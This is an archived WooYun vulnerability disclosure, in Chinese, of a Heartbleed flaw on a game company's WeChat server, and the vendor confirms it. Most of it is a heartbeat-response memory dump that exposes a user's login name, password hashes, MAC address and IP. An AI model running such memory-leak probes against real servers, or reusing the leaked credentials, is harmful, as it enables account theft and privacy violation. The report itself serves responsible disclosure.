乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-06-29: 厂商已经确认,细节仅向厂商公开 2015-07-09: 细节向核心白帽子及相关领域专家公开 2015-07-19: 细节向普通白帽子公开 2015-07-29: 细节向实习白帽子公开 2015-08-13: 细节向公众公开
233
weixin.zqgame.com
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 1510 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 54 4D 4C 2C ....#.......TML, 00e0: 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Gecko) Chr 00f0: 6F 6D 65 2F 33 31 2E 30 2E 31 36 35 30 2E 36 33 ome/31.0.1650.63 0100: 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 0A Safari/537.36". 0110: 01 00 00 00 00 00 00 00 47 45 54 20 2F 6C 6F 67 ........GET /log 0120: 69 6E 2F 31 2E 30 2F 6E 61 6D 65 3D 71 61 7A 71 in/1.0/name=qazq 0130: 77 65 61 7A 61 73 64 7A 78 63 26 4D 44 35 3D 31 weazasdzxc&MD5=1 0140: 32 64 33 37 33 35 61 37 31 38 36 63 32 33 34 65 2d3735a7186c234e 0150: 61 64 36 35 61 31 63 32 64 32 64 35 31 36 66 26 ad65a1c2d2d516f& 0160: 53 48 41 31 3D 66 63 35 39 34 66 36 38 65 33 31 SHA1=fc594f68e31 0170: 37 33 34 35 31 31 32 62 32 62 31 31 35 34 30 34 7345112b2b115404 0180: 64 33 61 35 66 34 61 34 31 35 34 32 61 26 61 64 d3a5f4a41542a&ad 0190: 76 65 72 69 6E 66 6F 3D 72 77 26 6D 61 63 3D 39 verinfo=rw&mac=9 01a0: 38 3A 36 63 3A 66 35 3A 36 34 3A 35 33 3A 36 38 8:6c:f5:64:53:68 01b0: 2F 31 35 34 2F 38 37 33 33 65 62 61 30 30 61 61 /154/8733eba00aa 01c0: 61 31 38 34 38 37 64 39 32 30 35 32 63 38 39 36 a18487d92052c896 01d0: 31 62 34 63 30 34 65 31 61 30 36 34 66 2F 31 34 1b4c04e1a064f/14 01e0: 33 35 35 34 34 36 30 35 31 38 39 2F 30 2F 33 62 35544605189/0/3b 01d0: 31 62 34 63 30 34 65 31 61 30 36 34 66 2F 31 34 1b4c04e1a064f/14 01e0: 33 35 35 34 34 36 30 35 31 38 39 2F 30 2F 33 62 35544605189/0/3b 01f0: 64 32 39 64 64 31 61 36 39 65 62 35 64 62 33 31 d29dd1a69eb5db31 0200: 32 64 32 31 63 65 38 62 34 30 32 35 31 36 62 36 2d21ce8b402516b6 0210: 65 31 36 38 35 36 20 48 54 54 50 2F 31 2E 30 0D e16856 HTTP/1.0. 0220: 0A 58 2D 52 65 61 6C 2D 49 50 3A 20 31 32 35 2E .X-Real-IP: 125. 0230: 37 31 2E 32 30 39 2E 31 30 38 0D 0A 48 6F 73 74 71.209.108..Host 0240: 3A 20 70 6C 61 74 66 6F 72 6D 2E 61 70 69 2E 7A : platform.api.z 0250: 71 67 61 6D 65 2E 63 6F 6D 0D 0A 58 2D 46 6F 72 qgame.com..X-For 0260: 77 61 72 64 65 64 2D 46 6F 72 3A 20 31 32 35 2E warded-For: 125. 0270: 37 31 2E 32 30 39 2E 31 30 38 0D 0A 58 2D 46 6F 71.209.108..X-Fo 0280: 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 31 32 35 rwarded-For: 125 0290: 2E 37 31 2E 32 30 39 2E 31 30 38 0D 0A 43 6F 6E .71.209.108..Con 02a0: 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close.. 02b0: 0D 0A 67 00 00 00 00 00 00 00 00 00 00 00 00 00 ..g............. 02c0: 00 00 00 00 00 00 00 00 C8 00 00 00 00 00 00 00 ................ 02d0: 01 00 00 00 00 00 00 00 99 FC FF FF FF FF FF FF ................ 02e0: AC 00 00 00 00 00 00 00 30 62 41 01 00 00 00 00 ........0bA..... 02f0: 00 00 00 00 00 00 00 00 90 0C 41 01 00 00 00 00 ..........A..... 0300: 00 00 00 00 00 00 00 00 E0 5D 41 01 00 00 00 00 .........]A..... 0310: 0B 00 00 00 00 00 00 00 88 CB 3F 01 00 00 00 00 ..........?..... 0320: 00 04 00 00 00 00 00 00 20 21 41 01 00 00 00 00 ........ !A..... 0330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0340: E0 59 2F 01 00 00 00 00 AE EF 2E 00 00 00 00 00 .Y/............. 0350: 04 00 00 00 00 00 00 00 30 CD 3F 01 00 00 00 00 ........0.?..... 0360: 1D 00 00 00 00 00 00 00 35 CD 3F 01 00 00 00 00 ........5.?..... 0370: 53 CD 3F 01 00 00 00 00 BA 26 7B BC 3D 82 C7 F0 S.?......&{.=... 0380: 0E 00 00 00 00 00 00 00 57 CD 3F 01 00 00 00 00 ........W.?..... 0390: 03 00 00 00 00 00 00 00 66 CD 3F 01 00 00 00 00 ........f.?..... 03a0: 6A CD 3F 01 00 00 00 00 15 A9 2F 00 00 00 00 00 j.?......./..... 03b0: 04 00 00 00 00 00 00 00 78 CD 3F 01 00 00 00 00 ........x.?..... 03c0: 2A 00 00 00 00 00 00 00 7D CD 3F 01 00 00 00 00 *.......}.?..... 03d0: A8 CD 3F 01 00 00 00 00 0E 60 D4 2E 0E 8D 36 24 ..?......`....6$ 03e0: 0C 00 00 00 00 00 00 00 AC CD 3F 01 00 00 00 00 ..........?..... 03f0: 18 00 00 00 00 00 00 00 B9 CD 3F 01 00 00 00 00 ..........?..... 0400: D2 CD 3F 01 00 00 00 00 00 00 00 00 00 00 00 00 ..?............. 0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................可以看到,能抓到用户名和md5(密码),X-Forwarded-For IP信息。多抓几次,可以抓到大量敏感信息,
~~
危害等级:中
漏洞Rank:10
确认时间:2015-06-29 17:57
非常感谢您的反馈,经测试漏洞确实存在。我们会尽快修复~
暂无
